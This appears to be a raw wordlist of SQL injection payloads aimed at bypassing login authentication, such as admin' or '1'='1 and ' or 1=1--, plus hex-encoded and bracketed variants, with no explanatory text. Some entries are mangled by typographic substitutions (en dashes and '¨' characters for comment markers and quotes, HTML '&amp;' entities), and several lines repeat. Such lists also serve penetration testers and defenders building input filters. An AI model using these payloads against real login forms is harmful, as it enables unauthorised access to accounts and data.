admin"or 1=1 or ""="
admin") or ("1"="1"--
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1-- 
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
' or "='
'=' 'or'
'or'1'='1 (güncel)
or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin' —
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'–
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or "='
admin' or 1=1
admin' or 1=1–
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'–
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'–
admin') or '1'='1'#
admin') or '1'='1'/*
admin" —
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1¨–
admin" or "1"="1¨#
admin" or "1"="1¨/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1–
admin" or 1=1#
admin" or 1=1/*
admin") or ("1¨="1
admin") or ("1¨="1¨–
admin") or ("1¨="1¨#
admin") or ("1¨="1¨/*
admin") or "1"="1
admin") or "1"="1¨–
admin") or "1"="1¨#
admin") or "1"="1¨/*
' or true–
') or true–
') or (")=('
') or 1–
') or ('x')=('
" or true–
" or ""="
" or 1–
" or "x"="
") or true–
") or ("")=("
") or 1–
") or ("x")=("
')) or true–
')) or (("))=(('
')) or 1–
')) or (('x'))=(('
'-'
'+'
'&amp;'
'^'
'*'
' or "-'
' or "+'
' or "&amp;'
' or "^'
' or "*'
"-"
"+"
"&amp;"
"^"
"*"
" or ""-"
" or ""+"
" or ""&amp;"
" or ""^"
" or ""*"
or true–
" or true–
' or true–
") or true–
') or true–
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("